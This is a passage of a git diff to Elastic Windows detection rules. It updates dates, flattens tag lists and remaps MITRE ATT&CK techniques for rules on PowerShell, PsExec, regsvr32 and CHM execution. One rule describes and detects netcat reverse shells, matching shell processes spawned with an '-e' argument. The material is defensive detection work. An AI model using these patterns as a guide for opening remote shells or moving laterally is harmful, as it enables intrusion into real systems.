"https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index f5e2c08a17b..aae57571bac 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -105,10 +105,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -119,15 +121,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml index c567451cf8d..fca2338e184 100644 --- a/rules/windows/execution_psexec_lateral_movement_command.toml +++ b/rules/windows/execution_psexec_lateral_movement_command.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,41 +94,36 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml index d0f7e9bb2f1..24ce6afd747 100644 --- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -109,16 +109,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "fb02b8d3-71ee-4af1-bacd-215d23f17efa" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] type = "eql" query = ''' @@ -142,16 +133,11 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.009" name = "Regsvcs/Regasm" @@ -162,10 +148,7 @@ id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 2ca0d6e9e10..1b531f5351e 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/10/14" +updated_date = "2026/03/23" [rule] @@ -52,14 +52,7 @@ Attackers may abuse the NetCat utility to execute commands remotely using the bu risk_score = 73 rule_id = "9c0f61fa-abf4-4b11-8d9d-5978c09182dd" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -75,10 +68,25 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -89,9 +97,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index 67a11ba82f0..bd57bc91060 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,15 +61,7 @@ references = [ risk_score = 47 rule_id = "5cd55388-a19c-47c7-8ec4-f41656c2fded" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -82,29 +74,36 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index bce62a907c5..b8228823b23 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,20 +53,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -80,41 +67,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - - -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index 8bc7d0e44cc..c03b2b0d9f8 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] @@ -104,20 +104,27 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index 26b1f2df891..dfd8907197a 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -32,19 +32,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link- risk_score = 47 rule_id = "a3ea12f3-0d4e-4667-8b44-4230c63f3c75" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -60,14 +48,18 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 9f27f9612ae..6d9476b2655 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,20 +67,7 @@ references = [ risk_score = 73 rule_id = "12f07955-1674-44f7-86b5-c35da0a6f41a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,6 +81,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -103,15 +91,31 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index c816d82ecd2..8a753362bf8 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,21 +76,7 @@ This rule looks for commonly abused built-in utilities spawned by a PDF reader p risk_score = 21 rule_id = "53a26770-9cbd-40c5-8b57-61d01a325e14" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -113,31 +99,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 6fcd26f682b..63a8aefc8fc 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,36 +80,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index 15d381da770..ecb2bdda992 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -119,20 +119,7 @@ When users double-click CHM files, the HTML Help executable program (`hh.exe`) w risk_score = 47 rule_id = "e3343ab9-4245-4715-b344-e11c56b0a47f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -145,36 +132,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index df930dae4f7..c4713761847 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,20 +76,7 @@ references = [ risk_score = 73 rule_id = "05b358de-aa6d-4f6c-89e6-78f74018b43b" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -107,38 +94,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 52678af5806..2b997f4d88f 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ references = ["https://www.elastic.co/security-labs/grimresource"] risk_score = 47 rule_id = "7e23dfef-da2c-4d64-b11d-5f285b638853" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -106,41 +93,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 9d8c461049c..7297fbfd210 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,19 +62,7 @@ The Windows Command Shell (cmd.exe) is a critical component for executing comman risk_score = 73 rule_id = "d9ffc3d6-9de9-4b29-9395-5757d0695ecf" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Crowdstrike"] timestamp_override = 